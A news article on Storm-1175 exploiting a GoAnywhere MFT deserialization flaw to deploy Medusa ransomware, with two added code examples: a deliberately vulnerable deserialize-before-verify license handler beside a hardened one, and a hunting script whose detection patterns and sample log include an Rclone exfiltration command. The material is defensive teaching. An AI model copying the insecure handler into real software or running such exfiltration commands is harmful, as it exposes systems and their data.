
Fortra GoAnywhere Bug Fuels Medusa Ransomware Attacks, Microsoft Warns

▼ Summary

– A critical vulnerability (CVE-2025-10035) in Fortra’s GoAnywhere MFT tool with a CVSS score of 10.0 is being actively exploited in ransomware attacks.
– The flaw allows attackers to bypass signature verification, deserialize malicious objects, and achieve remote code execution without authentication on internet-exposed systems.
– Threat group Storm-1175 exploited this as a zero-day on September 11, using tools like SimpleHelp, MeshAgent, and Rclone for network discovery, lateral movement, and data exfiltration.
– Medusa ransomware was deployed in at least one compromised environment, with over 500 GoAnywhere instances currently exposed globally, primarily in North America.
– Medusa ransomware has affected over 300 victims since 2021, including critical infrastructure, and affiliates typically gain initial access via phishing or exploiting unpatched vulnerabilities.

A critical security flaw in Fortra’s GoAnywhere Managed File Transfer (MFT) platform is fueling a wave of ransomware attacks, and Microsoft has issued an urgent alert for customers to apply the available patch immediately. The vulnerability, tracked as CVE-2025-10035, carries the maximum CVSS score of 10.0. According to Microsoft’s security team, the flaw is a deserialization weakness in the License Servlet of the Admin Console: an attacker can forge a license response signature, bypassing the verification check entirely, and thereby have the server deserialize attacker-crafted objects. That in turn can lead to command injection and full remote code execution on the affected system.
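The ordering problem behind this class of bug is worth seeing in code. The following is an added, generic illustration and not Fortra’s code (the article does not show the actual implementation): a handler that deserializes a native object graph before checking the signature, beside a hardened handler that verifies the signature over the raw bytes first and then parses a data-only format against a fixed field list. An HMAC-SHA256 key is assumed as a stand-in for the product’s license signature, Python pickle stands in for Java serialization, and the `Gadget` class and license fields are constructed for the demonstration.

```python
"""Added example: verify-before-deserialize, over raw bytes, with a data-only format.
Not Fortra's code. Key, field names, Gadget and sample messages are assumptions."""
import base64
import hashlib
import hmac
import json
import pickle

SERVER_KEY = b"demo-license-signing-key"        # assumed stand-in for the real signing key
ALLOWED_FIELDS = {"customer", "expires", "features"}  # assumed license document shape

EXECUTED = []  # records whether attacker-controlled code ran during deserialization


def _record(tag):
    """Benign stand-in for a gadget's side effect (a real one would run a command)."""
    EXECUTED.append(tag)
    return tag


class Gadget:
    """Constructed attacker object: pickle invokes __reduce__'s callable on load."""
    def __reduce__(self):
        return (_record, ("gadget-ran",))


def _sig_ok(raw, sig_hex):
    """Constant-time check of the signature over the exact bytes we received."""
    expected = hmac.new(SERVER_KEY, raw, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, sig_hex)


def sign_license(doc):
    """Server-side helper producing a legitimately signed license response."""
    raw = json.dumps(doc, sort_keys=True).encode()
    return {"payload": base64.b64encode(raw).decode(),
            "signature": hmac.new(SERVER_KEY, raw, hashlib.sha256).hexdigest()}


def forged_message():
    """Attacker's message: a serialized gadget with a garbage signature."""
    return {"payload": base64.b64encode(pickle.dumps(Gadget())).decode(),
            "signature": "0" * 64}


def vulnerable_handle(msg):
    """Vulnerable pattern: native deserialization runs before any verification,
    so the gadget executes even though the signature check later fails."""
    raw = base64.b64decode(msg["payload"])
    obj = pickle.loads(raw)  # attacker-controlled code runs here
    sig = msg.get("signature", "")
    if sig != hmac.new(SERVER_KEY, raw, hashlib.sha256).hexdigest():
        raise ValueError("bad signature")  # too late, and not constant-time
    return obj


def hardened_handle(msg):
    """Hardened pattern: reject unsigned or badly signed bytes before parsing,
    then parse a data-only format and check its structure."""
    raw = base64.b64decode(msg["payload"])
    sig = msg.get("signature")
    if not sig or not _sig_ok(raw, sig):
        raise ValueError("missing or bad signature")
    doc = json.loads(raw)  # no object graph, no constructors, no gadgets
    if not isinstance(doc, dict) or set(doc) != ALLOWED_FIELDS:
        raise ValueError("unexpected license structure")
    return doc


if __name__ == "__main__":
    try:
        vulnerable_handle(forged_message())
    except ValueError:
        pass
    print("vulnerable handler ran attacker code:", EXECUTED == ["gadget-ran"])
    EXECUTED.clear()
    try:
        hardened_handle(forged_message())
    except ValueError:
        print("hardened handler rejected forgery, code ran:", bool(EXECUTED))
    print(hardened_handle(sign_license({"customer": "ACME", "expires": "2026-01-01",
                                        "features": ["sftp"]})))
```

The point generalizes beyond this one product: a signature that is checked after deserialization, or over a parsed object rather than the received bytes, protects nothing, and even a correctly ordered check should not be the only thing standing between the network and a native object deserializer.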

What makes the situation particularly alarming is that exploitation requires no authentication, provided the attacker can generate or intercept a valid license response. That puts any GoAnywhere instance whose Admin Console is reachable from the internet at direct risk. Once inside, threat actors can carry out system and user reconnaissance, establish persistent access, and deploy additional tools to move laterally across the network and install malware.

Although Fortra released a patch on September 18, the threat group Storm-1175 had already been exploiting the vulnerability as a zero-day a week earlier. The group used legitimate remote monitoring and management (RMM) tools, including SimpleHelp and MeshAgent, to launch binaries; ran network scanning utilities such as netscan for discovery; and used Microsoft’s Remote Desktop Connection client for lateral movement. For command and control, the actors relied on the RMM tools themselves as their infrastructure backbone and established a Cloudflare tunnel for their communications. In the data exfiltration phase, investigators observed Rclone being deployed and executed in at least one compromised environment, and in one victim’s network the intrusion culminated in the deployment of Medusa ransomware.
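That tool chain is hunt-able from ordinary process-creation telemetry. The script below is an added example, not taken from the article or from Microsoft’s report: it walks a set of constructed process-creation events and scores each host by which Storm-1175 stages appear (RMM agent, discovery scanner, RDP client, tunnel, Rclone), and separately flags any non-Java child process spawned by the GoAnywhere service. The event field names, the sample events, the `goanywhere` parent-path keyword, the binary names `cloudflared` (the Cloudflare Tunnel client) and `mstsc.exe` (the Remote Desktop Connection client), and the severity thresholds are all assumptions made for this example.

```python
"""Added example: hunting the Storm-1175 post-exploitation chain in process events.
Not from the article or Microsoft. Field names, sample events, binary names and
thresholds are assumptions; the sample log is constructed."""
import json
import re

# One pattern per stage described in the article; binary names are assumptions.
STAGE_PATTERNS = {
    "rmm":       re.compile(r"simplehelp|meshagent", re.I),     # RMM agents
    "discovery": re.compile(r"netscan", re.I),                  # network scanner
    "lateral":   re.compile(r"\bmstsc(?:\.exe)?\b", re.I),      # RDP client
    "c2_tunnel": re.compile(r"cloudflared", re.I),              # Cloudflare tunnel client
    "exfil":     re.compile(r"\brclone(?:\.exe)?\b", re.I),     # Rclone
}
# Assumption: the MFT service's install path contains "goanywhere".
MFT_PROCESS = re.compile(r"goanywhere", re.I)

# Constructed JSON-lines process-creation events (Sysmon EID 1 / EDR style, simplified).
SAMPLE_LOG = r"""
{"ts":"2025-09-11T02:14:05Z","host":"mft-01","parent":"C:\\GoAnywhere\\jre\\bin\\java.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c whoami /all"}
{"ts":"2025-09-11T02:16:40Z","host":"mft-01","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\ProgramData\\Mesh\\MeshAgent.exe","cmdline":"MeshAgent.exe -install"}
{"ts":"2025-09-11T02:31:12Z","host":"mft-01","parent":"C:\\ProgramData\\Mesh\\MeshAgent.exe","image":"C:\\Users\\Public\\netscan.exe","cmdline":"netscan.exe /range:10.20.0.0/24"}
{"ts":"2025-09-11T02:45:03Z","host":"mft-01","parent":"C:\\ProgramData\\Mesh\\MeshAgent.exe","image":"C:\\Users\\Public\\cloudflared.exe","cmdline":"cloudflared.exe tunnel run"}
{"ts":"2025-09-12T01:05:59Z","host":"mft-01","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Users\\Public\\rclone.exe","cmdline":"rclone.exe copy D:\\Transfers remote:drop"}
{"ts":"2025-09-12T09:12:30Z","host":"ws-07","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\mstsc.exe","cmdline":"mstsc.exe /v:fs-01"}
{"ts":"2025-09-12T09:20:00Z","host":"build-02","parent":"C:\\Tools\\devenv.exe","image":"C:\\Tools\\msbuild.exe","cmdline":"msbuild.exe app.sln"}
"""


def parse_events(text):
    """Parse JSON lines into dicts, skipping blank lines."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def hunt(log_text):
    """Return {host: {severity, stages, spawned_from_mft, hits}} for hosts with findings."""
    per_host = {}
    for ev in parse_events(log_text):
        h = per_host.setdefault(ev["host"], {"stages": set(), "spawned_from_mft": False, "hits": []})
        haystack = ev["image"] + " " + ev.get("cmdline", "")
        for stage, pat in STAGE_PATTERNS.items():
            if pat.search(haystack):
                h["stages"].add(stage)
                h["hits"].append((ev["ts"], stage, ev["image"]))
        # The MFT service spawning anything other than itself is suspicious on its own.
        if MFT_PROCESS.search(ev["parent"]) and not MFT_PROCESS.search(ev["image"]):
            h["spawned_from_mft"] = True
            h["hits"].append((ev["ts"], "mft_child", ev["image"]))

    report = {}
    for host, h in per_host.items():
        if not h["stages"] and not h["spawned_from_mft"]:
            continue
        # Assumed thresholds: MFT child process or three or more stages is high.
        severity = "high" if h["spawned_from_mft"] or len(h["stages"]) >= 3 else "low"
        report[host] = {"severity": severity, "stages": sorted(h["stages"]),
                        "spawned_from_mft": h["spawned_from_mft"], "hits": h["hits"]}
    return report


if __name__ == "__main__":
    print(json.dumps(hunt(SAMPLE_LOG), indent=2))
```

A single RDP launch from an admin workstation scores low by design; what makes `mft-01` stand out is the combination of stages plus a shell spawned by the file-transfer service itself, which is the earliest and most reliable signal here. Against real telemetry, map the four fields from your Sysmon or EDR export and tune the name patterns to the actual RMM products in use.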

According to the Shadowserver Foundation’s internet scanning data, 513 GoAnywhere instances remain exposed online, with the majority, 363 systems, located in North America. This widespread exposure creates a significant attack surface for continued exploitation.

The Medusa ransomware operation, first identified in 2021, has accumulated over 300 victims globally, primarily targeting critical infrastructure sectors. A joint advisory from CISA, the FBI, and MS-ISAC noted that the ransomware-as-a-service variant has claimed more than 40 victims in just the first two months of 2025, including a confirmed attack against a United States healthcare organization. Affiliates distributing Medusa typically gain initial access through phishing campaigns or by exploiting unpatched software vulnerabilities, having previously leveraged flaws like the ScreenConnect authentication bypass (CVE-2024-1709) and the Fortinet EMS SQL injection vulnerability (CVE-2023-48788).

Microsoft has strongly recommended that all GoAnywhere customers immediately implement the available security patch, ensure their instances are not unnecessarily exposed to the internet, and maintain vigilant monitoring for any suspicious activity that might indicate compromise.

(Source: InfoSecurity Magazine)
